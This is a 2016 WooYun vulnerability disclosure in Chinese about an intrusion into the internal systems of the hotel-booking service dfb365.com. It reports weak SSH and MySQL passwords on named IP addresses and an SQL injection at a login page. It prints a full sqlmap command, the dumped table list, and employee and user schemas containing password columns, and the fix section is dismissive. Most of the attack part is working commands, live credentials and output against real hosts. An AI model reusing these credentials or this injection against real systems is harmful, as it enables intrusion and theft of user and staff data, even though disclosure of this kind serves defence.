漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0188591
漏洞标题:订房宝内部系统一日游(涉及多个重要系统\几十万用户数据\几万商户信息\员工账户\含密码)
相关厂商:dfb365.com
漏洞作者: 路淫甲
提交时间:2016-03-24 21:30
修复时间:2016-05-08 21:50
公开时间:2016-05-08 21:50
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-03-24: 细节已通知厂商并且等待厂商处理中
2016-03-24: 厂商已经确认,细节仅向厂商公开
2016-04-03: 细节向核心白帽子及相关领域专家公开
2016-04-13: 细节向普通白帽子公开
2016-04-23: 细节向实习白帽子公开
2016-05-08: 细节向公众公开
简要描述:
杀入订房宝,活捉苍井空
下面开始寻找苍老师的寻梦路程...
详细说明:
涉及系统:renaming、mail、cs等等
一些列问题直入内网,涉及各种用户数据
问题ip
首显是ssh弱口令,root权限,直入内网
ssh://114.215.150.232:8200
admin admin
外网3306是可以连的,不过admin没什么数据,root不可外连
mysql://114.215.150.232:3306
admin admin
内网本地mysql,root\root可连
技术部门的邮箱和密码就泄露了
组织架构:
公司架构里并没有“苍老师”,好失望!!!
项目信息:
漏洞证明:
SQL注入:
http://cs.dfb365.com/user/login.action
http://115.28.131.8:8082/user/login.action
sqlmap.py -u "http://115.28.131.8:8082/user/dologin.action" --data="model.email=admin*&model.password=123123" --threads=10 --tables -D "dfb356db2"
登录的位置就是注入点,登录后所有搜索框都是注入点
各种用户表
[15:25:08] [INFO] resumed: 134
[15:25:08] [INFO] resumed: action
[15:25:08] [INFO] resumed: activity
[15:25:08] [INFO] resumed: activity_business_record
[15:25:08] [INFO] resumed: activity_code
[15:25:08] [INFO] resumed: activity_hotel
[15:25:08] [INFO] resumed: activity_weixin
[15:25:08] [INFO] resumed: advertisement
[15:25:08] [INFO] resumed: advertisement_sort
[15:25:08] [INFO] resumed: app
[15:25:08] [INFO] resumed: b_log
[15:25:08] [INFO] resumed: basic_hotel_report
[15:25:08] [INFO] resumed: charge_refund_record
[15:25:08] [INFO] resumed: circle
[15:25:08] [INFO] resumed: city
[15:25:08] [INFO] resumed: district
[15:25:08] [INFO] resumed: employee
[15:25:08] [INFO] resumed: group
[15:25:08] [INFO] resumed: hotel
[15:25:08] [INFO] resumed: hotel_access_token
[15:25:08] [INFO] resumed: hotel_account
[15:25:08] [INFO] resumed: hotel_addition
[15:25:08] [INFO] resumed: hotel_auto_sell
[15:25:08] [INFO] resumed: hotel_bill
[15:25:08] [INFO] resumed: hotel_bomment
[15:25:08] [INFO] resumed: hotel_contact_person
[15:25:08] [INFO] resumed: hotel_dictionary
[15:25:08] [INFO] resumed: hotel_excellent
[15:25:08] [INFO] resumed: hotel_group
[15:25:08] [INFO] resumed: hotel_profile
[15:25:08] [INFO] resumed: hotel_recommended
[15:25:08] [INFO] resumed: hotel_service_fee
[15:25:08] [INFO] resumed: hotel_spread
[15:25:08] [INFO] resumed: hotel_spread_report
[15:25:08] [INFO] resumed: hotel_spread_withdraw
[15:25:08] [INFO] resumed: hotel_topic
[15:25:08] [INFO] resumed: interior
[15:25:08] [INFO] resumed: interior_bak
[15:25:08] [INFO] resumed: ip_access_count
[15:25:08] [INFO] resumed: ip_restrict
[15:25:08] [INFO] resumed: k_action
[15:25:08] [INFO] resumed: k_link_role_action
[15:25:08] [INFO] resumed: k_link_user_hotel
[15:25:08] [INFO] resumed: k_link_user_role
[15:25:08] [INFO] resumed: k_role
[15:25:08] [INFO] resumed: k_user
[15:25:08] [INFO] resumed: link_activity_hotel
[15:25:08] [INFO] resumed: link_activity_order
[15:25:08] [INFO] resumed: link_activity_passport
[15:25:08] [INFO] resumed: link_emp_role
[15:25:08] [INFO] resumed: link_hotel_city
[15:25:08] [INFO] resumed: link_hotel_group
[15:25:08] [INFO] resumed: link_hotel_photo
[15:25:08] [INFO] resumed: link_hotel_service
[15:25:08] [INFO] resumed: link_order_charge
[15:25:08] [INFO] resumed: link_order_coupon
[15:25:08] [INFO] resumed: link_response_room
[15:25:08] [INFO] resumed: link_response_room_bak
[15:25:08] [INFO] resumed: link_role_action
[15:25:08] [INFO] resumed: link_room_photo
[15:25:08] [INFO] resumed: link_room_price
[15:25:08] [INFO] resumed: link_room_state
[15:25:08] [INFO] resumed: link_sale_hotel
[15:25:08] [INFO] resumed: link_user_activitycode
[15:25:08] [INFO] resumed: link_wf_biztable
[15:25:08] [INFO] resumed: link_wf_refuse
[15:25:08] [INFO] resumed: location_airport
[15:25:08] [INFO] resumed: location_circle
[15:25:08] [INFO] resumed: location_city
[15:25:08] [INFO] resumed: location_district
[15:25:08] [INFO] resumed: location_line
[15:25:08] [INFO] resumed: location_station
[15:25:08] [INFO] resumed: location_subway
[15:25:08] [INFO] resumed: locomotor_activity
[15:25:08] [INFO] resumed: locomotor_activity_summary
[15:25:08] [INFO] resumed: locomotor_banner_summary
[15:25:08] [INFO] resumed: locomotor_type
[15:25:08] [INFO] resumed: mail_user
[15:25:08] [INFO] resumed: online_user
[15:25:08] [INFO] resumed: order_main
[15:25:08] [INFO] resumed: order_main_bak
[15:25:08] [INFO] resumed: order_main_temp
[15:25:08] [INFO] resumed: order_request
[15:25:08] [INFO] resumed: order_request_bak
[15:25:08] [INFO] resumed: order_response
[15:25:08] [INFO] resumed: order_response_bak
[15:25:08] [INFO] resumed: order_time
[15:25:08] [INFO] resumed: order_tohotels
[15:25:08] [INFO] resumed: order_user_infos_temp
[15:25:08] [INFO] resumed: pay_way_temp
[15:25:08] [INFO] resumed: photo
[15:25:08] [INFO] resumed: pingpp_charge
[15:25:08] [INFO] resumed: played_bills
[15:25:08] [INFO] resumed: policy
[15:25:08] [INFO] resumed: policy_action_hotel
[15:25:08] [INFO] resumed: policy_condition_hotel
[15:25:08] [INFO] resumed: red_envelop
[15:25:08] [INFO] resumed: red_envelope_link
[15:25:08] [INFO] resumed: role
[15:25:08] [INFO] resumed: room
[15:25:08] [INFO] resumed: room_auto_sell
[15:25:08] [INFO] resumed: room_prices
[15:25:08] [INFO] resumed: room_prices_temp
[15:25:08] [INFO] resumed: sms_verify_code
[15:25:08] [INFO] resumed: sys_dict
[15:25:08] [INFO] resumed: t_hotel_btoc
[15:25:08] [INFO] resumed: t_hotel_irect_log
[15:25:08] [INFO] resumed: t_promotion_detail
[15:25:08] [INFO] resumed: t_promotion_staff
[15:25:08] [INFO] resumed: test_weixin
[15:25:08] [INFO] resumed: threepart_token
[15:25:08] [INFO] resumed: threepart_user
[15:25:08] [INFO] resumed: tor_business_city
[15:25:08] [INFO] resumed: tor_hotel_direct
[15:25:08] [INFO] resumed: user
[15:25:08] [INFO] resumed: user_access_token
[15:25:08] [INFO] resumed: user_account
[15:25:08] [INFO] resumed: user_account_history
[15:25:08] [INFO] resumed: user_credit
[15:25:08] [INFO] resumed: user_passport
[15:25:08] [INFO] resumed: user_passport_list
[15:25:08] [INFO] resumed: user_pay
[15:25:08] [INFO] resumed: user_push_token
[15:25:08] [INFO] resumed: user_spread
[15:25:08] [INFO] resumed: user_statistics
[15:25:08] [INFO] resumed: weixin_user
[15:25:08] [INFO] resumed: wf_advice
[15:25:08] [INFO] resumed: wf_def
[15:25:08] [INFO] resumed: wf_node
[15:25:08] [INFO] resuming partial value: wf_node_pers
............
Database: dfb356db2
Table: employee
[12 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| account | varchar(30) |
| email | varchar(60) |
| has_update | char(1) |
| hotel_id | bigint(20) |
| id | bigint(20) |
| is_del | char(1) |
| is_direct | char(1) |
| is_manager | int(1) |
| mobile | char(20) |
| name | varchar(100) |
| password | char(40) |
| status | char(1) |
+------------+--------------+
Database: dfb356db2
Table: user
[13 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| device_id | varchar(50) |
| device_type | varchar(20) |
| email | varchar(50) |
| imei | varchar(50) |
| login_time | datetime |
| open_id | varchar(50) |
| password | varchar(50) |
| phone_number | varchar(50) |
| register_time | datetime |
| score | int(11) |
| source_from | varchar(20) |
| user_id | bigint(20) |
| user_name | varchar(50) |
+---------------+-------------+
还是没有找到“苍老师”!!
修复方案:
不玩了
版权声明:转载请注明来源 路淫甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2016-03-24 21:50
厂商回复:
漏洞修复中,很感谢, 路淫甲和乌云,我的联系方式 zhesheng.
最新状态:
暂无